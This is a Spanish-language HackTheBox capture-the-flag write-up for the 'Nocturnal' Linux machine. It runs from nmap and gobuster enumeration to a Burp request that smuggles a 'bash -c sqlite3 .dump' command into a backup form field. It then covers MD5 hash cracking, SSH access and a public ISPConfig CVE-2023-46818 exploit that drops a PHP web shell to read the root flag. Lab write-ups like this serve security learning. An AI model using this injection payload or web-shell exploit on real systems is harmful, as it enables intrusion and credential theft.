Nocturnal

Sobre esta maquina: HTB

Sistema Operativo: Linux

Skills Usados:

  • PHP

  • SQLI

  • Privilege

Primer reconocimiento con nmap:

nmap -p- --open -sS -T4 -Pn -n 10.10.11.64 -oN First_Scann Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-21 19:29 EDT Stats: 0:00:34 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 69.01% done; ETC: 19:30 (0:00:15 remaining) Nmap scan report for 10.10.11.64 Host is up (0.14s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 48.07 seconds

Reconocimiento con scripts y versiones:

nmap -p80,22 -sVC -T4 -Pn -n 10.10.11.64 -oN SV_Scann Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-21 19:30 EDT Nmap scan report for 10.10.11.64 Host is up (0.14s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 20:26:88:70:08:51:ee:de:3a:a6:20:41:87:96:25:17 (RSA) | 256 4f:80:05:33:a6:d4:22:64:e9:ed:14:e3:12:bc:96:f1 (ECDSA) |_ 256 d9:88:1f:68:43:8e:d4:2a:52:fc:f0:66:d4:b9:ee:6b (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://nocturnal.htb/ |_http-server-header: nginx/1.18.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Agregamos El dominio a nuestro etc/hosts para ver que corre en el puerto 80:

(captura)

Utilizamos whatweb para ver que tecnologias usa:

whatweb 10.10.11.64 http://nocturnal.htb/ [200 OK] Cookies[PHPSESSID], Country[RESERVED][ZZ], Email[support@nocturnal.htb], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.10.11.64], Title[Welcome to Nocturnal], nginx[1.18.0]

nos registramos:

(captura)

Enumeramos subdominios pero no conseguimos nada util:

gobuster dir -u "http://nocturnal.htb/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) [+] Url: http://nocturnal.htb/ [+] Method: GET [+] Threads: 20 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s Starting gobuster in directory enumeration mode /uploads (Status: 403) [Size: 162] /backups (Status: 301) [Size: 178] [--> http://nocturnal.htb/backups/]

Intentamos subir un archivo mientras captamos las peticiones con burp:

(captura)

Hacemos un ataque de fuerza bruta para listar usuarios, conseguimos los siguientes:

(captura en descargas)

Al descargarlos todos conseguimos una pista grande en Amanda:

Dear Amanda, Nocturnal has set the following temporary password for you: arHkG7HAI68X8s1J. This password has been set for all our services, so it is essential that you change it on your first login to ensure the security of your account and our infrastructure. The file has been created and provided by Nocturnal's IT team. If you have any questions or need additional assistance during the password change process, please do not hesitate to contact us. Remember that maintaining the security of your credentials is paramount to protecting your information and that of the company. We appreciate your prompt attention to this matter.

Yours sincerely, Nocturnal's IT team

Asi que intentamos ingresar en su sesion:

(captura)

Al ingresar conseguimos un archivo .odt y lo descargamos:

(captura)

No conseguimos nada en el archivo odt, asique vamos al panel de administracion:

(captura)

Conseguimos varios archivos interesantes, pero especificamente en el login.php conseguimos informacion super importante sobre la base de datos y como podemos acceder a contenido privilegiado utilizando burpsuite:

El codigo php de login:

prepare("SELECT * FROM users WHERE username = :username"); $stmt->bindValue(':username', $username, SQLITE3_TEXT); $result = $stmt->execute()->fetchArray(); if ($result && md5($password) === $result['password']) { $_SESSION['user_id'] = $result['id']; $_SESSION['username'] = $username; header('Location: dashboard.php'); exit(); } else { $error = 'Invalid username or password.'; } } ?>Login

Login

LoginDon't have an account? Register here

La peticion por burpsuite:

POST /admin.php?view=dashboard.php HTTP/1.1 Host: nocturnal.htb Content-Length: 108 Cache-Control: max-age=0 Accept-Language: en-US,en;q=0.9 Origin: http://nocturnal.htb Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://nocturnal.htb/admin.php?view=dashboard.php Accept-Encoding: gzip, deflate, br Cookie: PHPSESSID=eijjmosqk4m5ggpfg3fa7uosru Connection: keep-alive password=%0Abash%09- c%09"sqlite3%09/var/www/nocturnal_database/nocturnal_database.db%09.dump"%0A &backup=

Los hash recibidos con los usuarios en la base de datos:

INSERT INTO users VALUES(1,'admin','d725aeba143f575736b07e045d8ceebb'); INSERT INTO users VALUES(2,'amanda','df8b20aa0c935023f99ea58358fb63c4'); INSERT INTO users VALUES(4,'tobias','55c82b1ccd55ab219b3b109b07d5061d'); INSERT INTO users VALUES(6,'kavi','f38cde1654b39fea2bd4f72f1ae4cdda'); INSERT INTO users VALUES(7,'e0Al5','101ad4543a96a7fd84908fd0d802e7db');

Ahora crackeamos los hashes:

(captura)

55c82b1ccd55ab219b3b109b07d5061d md5 slowmotionapocalypse (tobias) f38cde1654b39fea2bd4f72f1ae4cdda md5 kavi (kavi)

Ingresamos por ssh a tobias y a kavi para intentar encontrar algo:

ssh tobias@10.10.11.64 password: slowmotionapocalypse tobias@nocturnal:~$

Estamos dentro ahora buscamos la primera flag:

tobias@nocturnal:$ ls user.txt tobias@nocturnal:$ cat user.txt 565a4b198257c71a6622b0c5ee7a95ba

despues de 1 hora viendo como escalar privilegios, vemos que el puerto 8080 corre otro servicio:

tobias@nocturnal:~$ netstat -tupln Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:587 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN - tcp6 0 0 :::22 :::* LISTEN - udp 0 0 127.0.0.53:53 0.0.0.0:* -

Asi que abrimos ssh como hosts:

ssh -L 8080:127.0.0.1:8080 tobias@nocturnal.htb password: slowmotionapocalypse

y estamos dentro, veamos que corre por el puerto 8080:

(captura)

Un ispconfig, probamos con las mismas credenciales,para fijarnos si hay reinicidencia admin y slowmotionapocalypse y estamos dentro:

(captura)

Conseguimos un exploit para ipsconfig, probaremos; https://github.com/blindma1den/CVE-2023-46818-Exploit:

python3 exploit.py

Usage: python exploit.py

python3 exploit.py http://127.0.0.1:8080 admin slowmotionapocalypse

[+] Logging in as 'admin' [+] Login successful. [+] Injecting PHP shell... [+] Shell dropped at 'sh.php' [+] Web shell ready. Type commands below. Ctrl+C or 'exit' to quit.

ispconfig-shell#

Estamos dentro, ahora buscamos la ultima flag:

ispconfig-shell# cat /root/root.txt d03d0a6a332cf31e1bbf26ab4104b05a

PreviousCodeNextCypher

Last updated